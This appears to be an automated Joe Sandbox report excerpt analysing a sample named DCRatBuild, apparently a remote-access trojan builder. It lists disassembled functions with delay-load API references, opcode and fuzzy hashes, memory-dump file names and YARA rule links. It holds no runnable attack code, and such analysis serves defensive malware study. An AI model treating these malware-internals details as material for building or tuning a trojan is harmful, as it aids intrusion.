                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 6b8aceb01ca883b3e85b8311583c4edc3dad3c230a120af2c5c2beba4042a7e7
                                                                                                                        • Instruction ID: 06e09bacbcd3b91866378ffb490aa5ece71c4cecd2d102af89fad9f2d692ca80
                                                                                                                        • Opcode Fuzzy Hash: 6b8aceb01ca883b3e85b8311583c4edc3dad3c230a120af2c5c2beba4042a7e7
                                                                                                                        • Instruction Fuzzy Hash: AEB012C5B580007C314861976F02E37011CC1D6B19330862FF428C2080EC4C0D12053E
                                                                                                                        Function 004AE5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE580
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: FjunJ
                                                                                                                        • API String ID: 1269201914-1583188906
                                                                                                                        • Opcode ID: 8f451ef56aca056d701983baf7fc0bba344ffff21f78a7b3323dae1c2a0022bb
                                                                                                                        • Instruction ID: e53d61047aab310b4de45dcf52138d563ebfdf2bfc86462f64f209690bd81334
                                                                                                                        • Opcode Fuzzy Hash: 8f451ef56aca056d701983baf7fc0bba344ffff21f78a7b3323dae1c2a0022bb
                                                                                                                        • Instruction Fuzzy Hash: A6B012C5B581007C318861976E03E37011CC1D6B19330862FF428C2080E84C0C41053E
                                                                                                                        Function 004AE25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 4b3af0f87d45d4cd2a545adeaedba49413f8fb32c1792bb94f8f223e4de9dc19
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 4b3af0f87d45d4cd2a545adeaedba49413f8fb32c1792bb94f8f223e4de9dc19
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: cd25c7d5cc1c419936256de1c4d6c5716938c141e48b194279b3587406ba7a0f
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: cd25c7d5cc1c419936256de1c4d6c5716938c141e48b194279b3587406ba7a0f
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 12c291c04a838c258caa20ff37802f98370324226f08fbf8122ce22f6b560efd
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 12c291c04a838c258caa20ff37802f98370324226f08fbf8122ce22f6b560efd
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: a13ab1ec20f42343648428da198abaac3d7bc9055a4ec0ffeb583d61816759f6
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: a13ab1ec20f42343648428da198abaac3d7bc9055a4ec0ffeb583d61816759f6
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 937fc82a8bf547d28d48fe74da7869b6cfe4313b9b369a82b927c5010c1f405c
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 937fc82a8bf547d28d48fe74da7869b6cfe4313b9b369a82b927c5010c1f405c
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 10a2094f7bdc777a3f115d02d28546ef40f0c8a3a36e58921d106537a131b89f
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 10a2094f7bdc777a3f115d02d28546ef40f0c8a3a36e58921d106537a131b89f
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 9e25f4bc439d2fdbf654ca51f9335576284fb371ae4605293afd6135f7fd88df
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 9e25f4bc439d2fdbf654ca51f9335576284fb371ae4605293afd6135f7fd88df
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: b01145e155bc42b1a54a4532233bf0cea8ddbe5e1df7f26adfa002df1a3b6e44
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: b01145e155bc42b1a54a4532233bf0cea8ddbe5e1df7f26adfa002df1a3b6e44
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 3770a1d446b389e866dfb1a962fbaf749066de8bc20e5d4865b7a53ec9d321bf
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 3770a1d446b389e866dfb1a962fbaf749066de8bc20e5d4865b7a53ec9d321bf
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 897fae13da712df572466ac49518156f3aff464a7d592df247e24f06040eaecd
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 897fae13da712df572466ac49518156f3aff464a7d592df247e24f06040eaecd
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE1E3
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: J
                                                                                                                        • API String ID: 1269201914-200179588
                                                                                                                        • Opcode ID: 4e475341e4bcc868b80bbb4bc3208716f2710a2011bb1918a6c86fd22ca7a4b4
                                                                                                                        • Instruction ID: e51637f16f7ea827328b7123e2d68ebb1851668b0801c7ebadb027b9215d1844
                                                                                                                        • Opcode Fuzzy Hash: 4e475341e4bcc868b80bbb4bc3208716f2710a2011bb1918a6c86fd22ca7a4b4
                                                                                                                        • Instruction Fuzzy Hash: 40A002E5559151FC314461535D86D37111DC5D6B55330452FF826C5485585C68451479
                                                                                                                        Function 004AE541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE51F
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID: PDu<J
                                                                                                                        • API String ID: 1269201914-2547070606
                                                                                                                        • Opcode ID: 30bff3ab0c027b4cf0889fb735026935ef6b75688cc586fd2b96ac385f79dfce
                                                                                                                        • Instruction ID: c7b42be724f1191b967e08a8b7537c0051d63d3d5a2fe1a731584e8b8937d0d6
                                                                                                                        • Opcode Fuzzy Hash: 30bff3ab0c027b4cf0889fb735026935ef6b75688cc586fd2b96ac385f79dfce
                                                                                                                        • Instruction Fuzzy Hash: C5A012C5A590017C300431432D02D3B010CC0D7F1C330441FF42580080684C0C010439
                                                                                                                        Function 004AE55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
